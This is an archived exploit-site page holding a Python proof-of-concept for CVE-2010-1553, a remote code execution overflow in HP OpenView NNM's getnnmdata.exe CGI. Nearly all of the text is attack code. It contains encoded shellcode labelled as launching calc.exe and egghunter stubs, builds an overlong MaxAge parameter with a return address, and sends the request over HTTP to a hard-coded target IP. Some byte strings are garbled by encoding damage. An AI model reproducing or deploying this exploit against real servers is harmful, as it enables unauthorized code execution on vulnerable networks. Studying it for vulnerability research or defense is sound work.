<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Code Execution</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================================
HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution
=======================================================================

# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1553

# Code :

#!/usr/bin/python

import struct
import socket
import httplib
import urllib

# calc.exe Windows Execute Command
sc2 = (
&quot;x89xe7xdbxc4xd9×77xf4×5ax4ax4ax4ax4ax4ax4ax4a&quot;
&quot;x4ax4ax4ax4ax43×43x43×43x43×43x37×52x59×6ax41&quot;
&quot;x58×50x30×41x30×41x6bx41×41x51×32x41×42x32×42&quot;
&quot;x42×30x42×42x41×42x58×50x38×41x42×75x4ax49×4b&quot;
&quot;x4cx4ax48×4cx49×47x70×43x30×45x50×51x70×4fx79&quot;
&quot;x4dx35×50x31×4bx62×43x54×4ex6bx51×42x46×50x4e&quot;
&quot;x6bx50×52x46×6cx4ex6bx51×42x46×74x4cx4bx43×42&quot;
&quot;x47×58x46×6fx4fx47×42x6ax46×46x44×71x4bx4fx44&quot;
&quot;x71×4fx30×4ex4cx47×4cx51×71x51×6cx46×62x44×6c&quot;
&quot;x45×70x4fx31×48x4fx44×4dx47×71x4ax67×4ax42×4c&quot;
&quot;x30×43x62×46x37×4cx4bx50×52x44×50x4cx4bx42×62&quot;
&quot;x45×6cx45×51x4ex30×4cx4bx47×30x50×78x4ex65×4b&quot;
&quot;x70×43x44×43x7ax43×31x4ax70×46x30×4ex6bx51×58&quot;
&quot;x42×38x4cx4bx46×38x47×50x43×31x4bx63×4bx53×47&quot;
&quot;x4cx42×69x4cx4bx45×64x4cx4bx45×51x4ax76×46x51&quot;
&quot;x4bx4fx45×61x49×50x4cx6cx4ax61×48x4fx44×4dx45&quot;
&quot;x51×4ax67×47x48×4bx50×44x35×4bx44×44x43×43x4d&quot;
&quot;x4ax58×47x4bx43×4dx51×34x51×65x4dx32×42x78×4c&quot;
&quot;x4bx43×68x47×54x47×71x4ax73×51x76×4cx4bx46×6c&quot;
&quot;x50×4bx4ex6bx42×78x45×4cx45×51x49×43x4cx4bx47&quot;
&quot;x74×4ex6bx47×71x4ex30×4dx59×47x34×46x44×44x64&quot;
&quot;x51×4bx43×6bx50×61x42×79x42×7ax50×51x49×6fx49&quot;
&quot;x70×43x68×51x4fx51×4ax4ex6bx45×42x4ax4bx4dx56&quot;
&quot;x43×6dx50×6ax47×71x4cx4dx4cx45×4ex59×45x50×45&quot;
&quot;x50×45x50×50x50×43x58×45x61×4ex6bx42×4fx4bx37&quot;
&quot;x4bx4fx4ax75×4dx6bx4cx30×4cx75×49x32×42x76×50&quot;
&quot;x68×4dx76×4ax35×4fx4dx4fx6dx4bx4fx49×45x47×4c&quot;
&quot;x43×36x51×6cx45×5ax4bx30×49x6bx4bx50×43x45×45&quot;
&quot;x55×4dx6bx42×67x47×63x51×62x42×4fx50×6ax45×50&quot;
&quot;x51×43x4bx4fx4bx65×45x33×43x51×50x6cx45×33x46&quot;
&quot;x4ex43×55x51×68x50×65x43×30x45×5ax41×41&quot;
)

egghunter = (
&quot;x66×81xcaxffx0fx42×52x6a&quot;
&quot;x02×58xcdx2ex3cx05×5ax74&quot;
&quot;xefxb8×54x30×30x57×8bxfa&quot;
&quot;xafx75xeaxafx75xe7xffxe7&quot;
)

egghunter = (
&quot;x89xe1xdaxd7xd9×71xf4×5bx53×59x49×49x49×49x49&quot;
&quot;x49×49x49×49x49×43x43×43x43×43x43×37x51×5ax6a&quot;
&quot;x41×58x50×30x41×30x41×6bx41×41x51×32x41×42x32&quot;
&quot;x42×42x30×42x42×41x42×58x50×38x41×42x75×4ax49&quot;
&quot;x50×66x4fx71×4bx7ax49×6fx46×6fx50×42x51×42x43&quot;
&quot;x5ax45×52x43×68x48×4dx46×4ex45×6cx47×75x42×7a&quot;
&quot;x44×34x48×6fx4ex58×42x74×50x30×46x50×42x77×4c&quot;
&quot;x4bx4ax5ax4ex4fx43×45x4ax4ax4cx6fx43×45x4ax47&quot;
&quot;x49×6fx4bx57×41x41&quot;
)

ret = struct.pack(‘&lt;L’,0×5A667A77) # ppr
jmp = ‘xebx80×90x90′

p = ‘Topo=X&amp;SnmpVals=X&amp;Hostname=X&amp;MaxAge=’+'A’*(2022-94) + egghunter + jmp + ret

h = {&quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,&quot;Host&quot;:&quot;172.16.29.149&quot;,&quot;User-Agent&quot;:&quot;T00WT00W&quot;+sc2}

c = httplib.HTTPConnection(‘172.16.29.149′)
c.request(&quot;POST&quot;,&quot;/OvCgi/getnnmdata.exe&quot;,p,h)
r = c.getresponse()

print r.status, r.reason
data = r.read()
print data
c.close()

print &quot;nDonen&quot;

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-02]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13084